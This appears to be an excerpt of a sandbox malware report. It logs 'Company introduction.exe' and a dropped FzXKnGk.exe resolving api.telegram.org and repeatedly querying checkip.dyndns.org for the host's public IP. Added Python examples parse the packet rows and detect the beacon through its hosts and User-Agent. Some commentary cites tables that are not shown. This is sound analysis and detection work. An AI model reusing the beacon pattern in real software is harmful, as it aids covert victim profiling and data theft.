Jan 15, 2025 08:39:03.340167999 CET | 1.1.1.1 | 192.168.2.4 | 0x5372 | No error (0) | checkip.dyndns.com | - | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:03.340167999 CET | 1.1.1.1 | 192.168.2.4 | 0x5372 | No error (0) | checkip.dyndns.com | - | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:03.340167999 CET | 1.1.1.1 | 192.168.2.4 | 0x5372 | No error (0) | checkip.dyndns.com | - | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:03.340167999 CET | 1.1.1.1 | 192.168.2.4 | 0x5372 | No error (0) | checkip.dyndns.com | - | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.233692884 CET | 1.1.1.1 | 192.168.2.4 | 0xf293 | No error (0) | reallyfreegeoip.org | - | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.233692884 CET | 1.1.1.1 | 192.168.2.4 | 0xf293 | No error (0) | reallyfreegeoip.org | - | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.233692884 CET | 1.1.1.1 | 192.168.2.4 | 0xf293 | No error (0) | reallyfreegeoip.org | - | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.233692884 CET | 1.1.1.1 | 192.168.2.4 | 0xf293 | No error (0) | reallyfreegeoip.org | - | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.233692884 CET | 1.1.1.1 | 192.168.2.4 | 0xf293 | No error (0) | reallyfreegeoip.org | - | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.233692884 CET | 1.1.1.1 | 192.168.2.4 | 0xf293 | No error (0) | reallyfreegeoip.org | - | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:04.233692884 CET | 1.1.1.1 | 192.168.2.4 | 0xf293 | No error (0) | reallyfreegeoip.org | - | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 15, 2025 08:39:14.742846966 CET | 1.1.1.1 | 192.168.2.4 | 0x5849 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
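The packet tables above come out of the report export with the separators lost: source port, destination port, source IP and destination IP are glued into one digit run such as "CET8049762193.122.6.168192.168.2.4", and a naive split is ambiguous (804|9762 is as valid a pair of ports as 80|49762). The following is an added example, not part of the Joe Sandbox report, that recovers the columns by enumerating every cut that produces two valid ports and two valid IPv4 addresses and accepting a cut only when one port belongs to a service set and one endpoint is the sandbox host. The service set {53, 80, 443} and the "one side is the sandbox host" rule are assumptions chosen for this capture; 192.168.2.4 and the sample rows are taken from the tables above. Rows that still have more than one plausible split are refused rather than guessed.

```python
"""Recover the columns of Joe Sandbox packet rows whose separators were lost.

Added example, not part of the Joe Sandbox report. Assumptions: the only
services contacted are on ports 53/80/443, and every row has the sandbox
host (192.168.2.4 in the report) as one endpoint.
"""
import re
from collections import Counter
from typing import Iterator, NamedTuple

SERVICE_PORTS = {53, 80, 443}   # assumption: the services seen in this capture
SANDBOX_HOST = "192.168.2.4"    # the analysis VM's address in the report

ROW_RE = re.compile(r"^(?P<ts>.+? CET)(?P<tail>[0-9.]+)$")

# Constructed sample input: rows copied from the report's UDP and TCP tables.
SAMPLE_ROWS = [
    "Jan 15, 2025 08:39:03.333297968 CET5854053192.168.2.41.1.1.1",
    "Jan 15, 2025 08:39:03.340167999 CET53585401.1.1.1192.168.2.4",
    "Jan 15, 2025 08:39:14.542193890 CET49764443192.168.2.4104.21.48.1",
    "Jan 15, 2025 08:39:14.736341000 CET4976280192.168.2.4193.122.6.168",
    "Jan 15, 2025 08:39:14.741529942 CET8049762193.122.6.168192.168.2.4",
    "Jan 15, 2025 08:39:14.743679047 CET49766443192.168.2.4149.154.167.220",
    "Jan 15, 2025 08:39:14.743726015 CET44349766149.154.167.220192.168.2.4",
]


class Packet(NamedTuple):
    timestamp: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def _valid_octet(s: str) -> bool:
    return s.isdigit() and (s == "0" or not s.startswith("0")) and int(s) <= 255


def _valid_port(s: str) -> bool:
    return s.isdigit() and not s.startswith("0") and int(s) <= 65535


def _candidates(tail: str) -> Iterator[tuple]:
    """Yield every (src_port, dst_port, src_ip, dst_ip) the digit run could encode."""
    parts = tail.split(".")
    if len(parts) != 7:          # a.b.c.d + e.f.g.h keep six dots -> seven groups
        return
    head, b, c, fused, f, g, h = parts
    for a_len in (1, 2, 3):      # src octet "a" is the end of the leading digit run
        a, ports = head[-a_len:], head[:-a_len]
        if not _valid_octet(a) or not ports:
            continue
        for cut in range(1, len(ports)):
            p1, p2 = ports[:cut], ports[cut:]
            if not (_valid_port(p1) and _valid_port(p2)):
                continue
            for d_len in range(1, len(fused)):   # fused = d (src end) + e (dst start)
                d, e = fused[:d_len], fused[d_len:]
                if all(_valid_octet(x) for x in (b, c, d, e, f, g, h)):
                    yield int(p1), int(p2), f"{a}.{b}.{c}.{d}", f"{e}.{f}.{g}.{h}"


def parse_row(line: str, host: str = SANDBOX_HOST) -> Packet:
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    found = {c for c in _candidates(m["tail"])
             if {c[0], c[1]} & SERVICE_PORTS and host in (c[2], c[3])}
    if len(found) != 1:          # refuse to guess; an analyst has to resolve these
        raise ValueError(f"{len(found)} plausible splits for {line!r}")
    return Packet(m["ts"], *found.pop())


def outbound_summary(rows, host: str = SANDBOX_HOST) -> Counter:
    """Packets the sandbox host sent, counted per (dst_ip, dst_port)."""
    packets = [parse_row(r, host) for r in rows]
    return Counter((p.dst_ip, p.dst_port) for p in packets if p.src_ip == host)


if __name__ == "__main__":
    for (ip, port), n in sorted(outbound_summary(SAMPLE_ROWS).items()):
        print(f"{ip}:{port}\t{n} packet(s)")
```

The two constraints matter: without the service-port rule, "8049762" also splits as 804|9762 and 8049|762; without the host rule, the DNS reply row "53585401.1.1.1192.168.2.4" also reads as 1.1.1.11 talking to 92.168.2.4. On a capture that contacts other services, widen SERVICE_PORTS rather than loosening the uniqueness check.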
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 193.122.6.168 | 80 | 7812 | C:\Users\user\Desktop\Company introduction.exe
Timestamp | Bytes transferred | Direction | Data
Jan 15, 2025 08:39:03.352514029 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 15, 2025 08:39:03.979095936 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:03 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 08:39:03.991544962 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 15, 2025 08:39:04.177424908 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:04 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 08:39:04.957642078 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 15, 2025 08:39:05.144056082 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:05 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
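Session 0 above is the sample's first network action: three GET / requests to checkip.dyndns.org in under two seconds, all carrying the legacy "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)" User-Agent, each answered with the host's public address. The following is an added example, not part of the Joe Sandbox report, of detection logic that a SOC could run over such a session transcript: it pairs each outbound request with the next inbound response, flags requests to the IP-lookup hosts seen in this report's DNS traffic when they carry that User-Agent, pulls the leaked public IP out of the response body, and reports a retry burst when one host is hit repeatedly inside a short window. SESSION_0 is a constructed transcript mirroring session 0 in the "timestamp | bytes | direction | data" layout; the detector, its field names and the burst threshold (3 hits in 5 s) are assumptions of this example, and only the indicators themselves come from the report.

```python
"""Flag the external-IP lookup beacon seen in the report's HTTP session 0.

Added example, not part of the Joe Sandbox report. SESSION_0 is a constructed
transcript mirroring session 0; the detector and its threshold are assumptions.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional

# Indicators from the report: the IE6/.NET 1.0 User-Agent and the lookup hosts.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
RECORD_RE = re.compile(r"^(?P<ts>\w{3} \d{1,2}, \d{4} [\d:]+\.\d+) CET \| "
                       r"(?P<size>\d+) \| (?P<dir>OUT|IN) \| (?P<start>.*)$")
PUBLIC_IP_RE = re.compile(r"Current IP Address: (\d{1,3}(?:\.\d{1,3}){3})")

SESSION_0 = """\
Jan 15, 2025 08:39:03.352514029 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 15, 2025 08:39:03.979095936 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Jan 2025 07:39:03 GMT
Content-Length: 104
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 08:39:03.991544962 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 15, 2025 08:39:04.177424908 CET | 273 | IN | HTTP/1.1 200 OK
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 15, 2025 08:39:04.957642078 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 15, 2025 08:39:05.144056082 CET | 273 | IN | HTTP/1.1 200 OK
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
"""


@dataclass
class Message:
    ts: datetime
    direction: str                  # OUT = sent by the sandbox host, IN = server reply
    start_line: str
    headers: dict = field(default_factory=dict)
    body: str = ""


@dataclass
class Finding:
    ts: datetime
    host: str
    public_ip: Optional[str]        # address the lookup service handed back, if any


def _parse_ts(text: str) -> datetime:
    # The report prints nanoseconds; strptime's %f accepts at most six digits.
    whole, frac = text.split(".")
    return datetime.strptime(f"{whole}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_session(text: str) -> list:
    """Split a session transcript into messages with lower-cased header names."""
    messages = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            messages.append(Message(_parse_ts(m["ts"]), m["dir"], m["start"]))
        elif messages and line.startswith("Data Ascii: "):
            messages[-1].body = line[len("Data Ascii: "):]
        elif messages and ": " in line and not line.startswith("Data Raw: "):
            name, value = line.split(": ", 1)
            messages[-1].headers[name.lower()] = value
    return messages


def detect_ip_check_beacons(text: str) -> list:
    """Pair each flagged request with the next response and extract the leaked IP."""
    msgs = parse_session(text)
    findings = []
    for i, req in enumerate(msgs):
        if req.direction != "OUT":
            continue
        host = req.headers.get("host", "").lower()
        if host not in IP_CHECK_HOSTS or req.headers.get("user-agent") != LEGACY_UA:
            continue
        resp = next((m for m in msgs[i + 1:] if m.direction == "IN"), None)
        hit = PUBLIC_IP_RE.search(resp.body) if resp else None
        findings.append(Finding(req.ts, host, hit.group(1) if hit else None))
    return findings


def is_retry_burst(findings, min_hits: int = 3, window=timedelta(seconds=5)) -> bool:
    """True if one host was queried min_hits times inside the window (assumed threshold)."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, []).append(f.ts)
    for stamps in by_host.values():
        stamps.sort()
        if any(stamps[j + min_hits - 1] - stamps[j] <= window
               for j in range(len(stamps) - min_hits + 1)):
            return True
    return False


if __name__ == "__main__":
    hits = detect_ip_check_beacons(SESSION_0)
    for f in hits:
        print(f"{f.ts.time()}  {f.host}  leaked public IP: {f.public_ip}")
    print("retry burst:", is_retry_burst(hits))
```

A request to checkip.dyndns.org on its own is a weak signal, since legitimate software uses the same service; the combination of that host, a User-Agent no current browser sends, and an immediate retry burst is what separates this beacon from background noise. The same session layout covers the dropped copy in session 1 (C:\Users\user\AppData\Roaming\FzXKnGk.exe), which repeats the identical request.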


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 8144 | Process: C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp: Jan 15, 2025 08:39:05.691999912 CET | Bytes transferred: 151 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Timestamp: Jan 15, 2025 08:39:06.312624931 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:06 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Timestamp: Jan 15, 2025 08:39:06.316016912 CET | Bytes transferred: 127 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Timestamp: Jan 15, 2025 08:39:06.501981020 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:06 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Timestamp: Jan 15, 2025 08:39:07.225227118 CET | Bytes transferred: 127 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Timestamp: Jan 15, 2025 08:39:07.410420895 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:07 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 7812 | Process: C:\Users\user\Desktop\Company introduction.exe

Timestamp: Jan 15, 2025 08:39:05.782098055 CET | Bytes transferred: 127 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Timestamp: Jan 15, 2025 08:39:06.408117056 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:06 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 7812 | Process: C:\Users\user\Desktop\Company introduction.exe

Timestamp: Jan 15, 2025 08:39:07.033612013 CET | Bytes transferred: 151 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Timestamp: Jan 15, 2025 08:39:07.667814970 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:07 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 8144 | Process: C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp: Jan 15, 2025 08:39:08.017352104 CET | Bytes transferred: 127 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Timestamp: Jan 15, 2025 08:39:08.652220964 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:08 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 7812 | Process: C:\Users\user\Desktop\Company introduction.exe

Timestamp: Jan 15, 2025 08:39:08.290771961 CET | Bytes transferred: 151 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Timestamp: Jan 15, 2025 08:39:08.917781115 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:08 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 8144 | Process: C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp: Jan 15, 2025 08:39:09.272509098 CET | Bytes transferred: 151 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Timestamp: Jan 15, 2025 08:39:09.906088114 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:09 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 7812 | Process: C:\Users\user\Desktop\Company introduction.exe

Timestamp: Jan 15, 2025 08:39:09.525104046 CET | Bytes transferred: 151 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Timestamp: Jan 15, 2025 08:39:10.149517059 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:10 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49753 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 8144 | Process: C:\Users\user\AppData\Roaming\FzXKnGk.exe

Timestamp: Jan 15, 2025 08:39:10.524418116 CET | Bytes transferred: 151 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Timestamp: Jan 15, 2025 08:39:11.158901930 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:11 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49754 | Destination IP: 193.122.6.168 | Destination Port: 80 | PID: 7812 | Process: C:\Users\user\Desktop\Company introduction.exe

Timestamp: Jan 15, 2025 08:39:10.778608084 CET | Bytes transferred: 151 | Direction: OUT
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Timestamp: Jan 15, 2025 08:39:11.401498079 CET | Bytes transferred: 273 | Direction: IN
  HTTP/1.1 200 OK
  Date: Wed, 15 Jan 2025 07:39:11 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  10192.168.2.449757193.122.6.168808144C:\Users\user\AppData\Roaming\FzXKnGk.exe
